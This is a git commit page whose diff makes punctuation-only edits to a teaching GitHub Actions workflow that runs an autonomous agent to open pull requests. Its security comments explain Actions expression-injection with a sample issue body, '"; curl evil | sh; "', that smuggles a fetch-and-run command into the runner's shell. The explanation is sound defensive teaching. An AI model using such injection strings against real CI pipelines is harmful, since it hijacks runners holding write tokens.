style(no-slop): remove every em-dash + banned words across all modules + capstone
Apply the no-ai-slop standard (now binding in AGENTS.md): the em-dash character is banned outright (restructured, not blind-replaced), plus the banned word/phrase list (delve, leverage, robust, seamless, truly, unlock, etc.). 0 em-dashes remain in modules + capstone; the only "robust" left is the planted M10 ai-change.patch trap. Module H1 titles use a colon separator. All deliberate teaching devices preserved; labs compile/parse (py/sh/yaml/json); no junk. AGENTS.md updated with the hard no-slop rules. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01TfzV5QvtPDz8LJS3Pu5VLT
This commit is contained in:
@@ -1,15 +1,15 @@
|
||||
# Reference: an autonomous agent running as a RUNNER JOB (Module 19) — triggered and scheduled.
|
||||
# Reference: an autonomous agent running as a RUNNER JOB (Module 19), triggered and scheduled.
|
||||
#
|
||||
# This is the "for real" version of agent_runner.py: instead of you launching the agent, the forge
|
||||
# launches it on a runner in response to an event or a timer, and the agent opens a PR. That PR then
|
||||
# hits your NORMAL gates — CI (Module 14), security scanning (Module 15), and human review (Module
|
||||
# 10) — exactly like a human's PR. The supervision is structural; this file just automates the start.
|
||||
# hits your NORMAL gates: CI (Module 14), security scanning (Module 15), and human review (Module
|
||||
# 10), exactly like a human's PR. The supervision is structural; this file just automates the start.
|
||||
#
|
||||
# GitHub Actions flavor (same as Module 14's ci.yml), so it goes in .github/workflows/. Equivalents:
|
||||
# * GitLab: a job with `rules:` on $CI_PIPELINE_SOURCE + a `workflow:` schedule.
|
||||
# * Forgejo/Gitea: the same YAML under .forgejo/workflows/ or .gitea/workflows/.
|
||||
#
|
||||
# DO NOT enable this blindly. Read the security notes at the bottom first — an unattended agent with a
|
||||
# DO NOT enable this blindly. Read the security notes at the bottom first; an unattended agent with a
|
||||
# write token is automation acting in your name. This is the last thing you turn on, on purpose.
|
||||
|
||||
name: agent-issue-to-pr
|
||||
@@ -18,7 +18,7 @@ on:
|
||||
# TRIGGERED: fire when an issue gets the `agent` label. Event in -> agent runs -> PR out.
|
||||
issues:
|
||||
types: [labeled]
|
||||
# SCHEDULED: also attempt work overnight. This is "the workflow runs itself" — keep it cheap.
|
||||
# SCHEDULED: also attempt work overnight. This is "the workflow runs itself", so keep it cheap.
|
||||
schedule:
|
||||
- cron: "0 6 * * *" # 06:00 UTC daily; adjust to your timezone and budget.
|
||||
|
||||
@@ -27,7 +27,7 @@ jobs:
|
||||
# Only run the triggered path when the label is actually `agent` (labeled events fire for ANY
|
||||
# label). The scheduled path has no label, so allow it through too.
|
||||
if: ${{ github.event_name == 'schedule' || github.event.label.name == 'agent' }}
|
||||
runs-on: ubuntu-latest # whose compute this is — see Module 19 for self-hosted runners.
|
||||
runs-on: ubuntu-latest # whose compute this is; see Module 19 for self-hosted runners.
|
||||
|
||||
# Least privilege (Module 17): grant ONLY what opening a PR needs. Not admin, not secrets access.
|
||||
permissions:
|
||||
@@ -49,13 +49,13 @@ jobs:
|
||||
|
||||
- name: Run the agent on a fresh branch
|
||||
env:
|
||||
# The agent's model credentials come from a SCOPED secret you set in the forge — never
|
||||
# The agent's model credentials come from a SCOPED secret you set in the forge, never
|
||||
# hardcoded here (Module 17). Keep this provider-neutral: it's whatever your agent needs.
|
||||
AGENT_API_KEY: ${{ secrets.AGENT_API_KEY }}
|
||||
# Point AGENT_CMD at your agentic tool's non-interactive / one-shot mode.
|
||||
AGENT_CMD: "your-agent-cli --print --prompt-file {prompt_file}"
|
||||
# The issue body is UNTRUSTED. Pass it through env, never interpolated into the run: script
|
||||
# below — see the security notes (Actions expression-injection) for why this matters.
|
||||
# below; see the security notes (Actions expression-injection) for why this matters.
|
||||
BODY: ${{ github.event.issue.body }}
|
||||
run: |
|
||||
git switch -c "agent/issue-${{ github.event.issue.number || github.run_id }}"
|
||||
@@ -74,9 +74,9 @@ jobs:
|
||||
|
||||
# --- Security notes (read before enabling) -------------------------------------------------------
|
||||
# * Actions expression-injection (THIS file, a different bug from prompt injection): never paste
|
||||
# ${{ github.event.issue.body }} — or any untrusted ${{ ... }} — directly into a run: script. The
|
||||
# ${{ github.event.issue.body }} (or any untrusted ${{ ... }}) directly into a run: script. The
|
||||
# ${{ }} is expanded into the script TEXT before the shell runs it, so a crafted issue body like
|
||||
# `"; curl evil | sh; "` executes on the runner before the agent is even invoked — with this job's
|
||||
# `"; curl evil | sh; "` executes on the runner before the agent is even invoked, with this job's
|
||||
# write token in scope. The fix above passes the body through env: (BODY) and reads it as "$BODY",
|
||||
# so the shell sees it as data, not code. Expression-injection attacks the runner's shell; prompt
|
||||
# injection (below) attacks the agent's reasoning. Defend against both.
|
||||
|
||||
Reference in New Issue
Block a user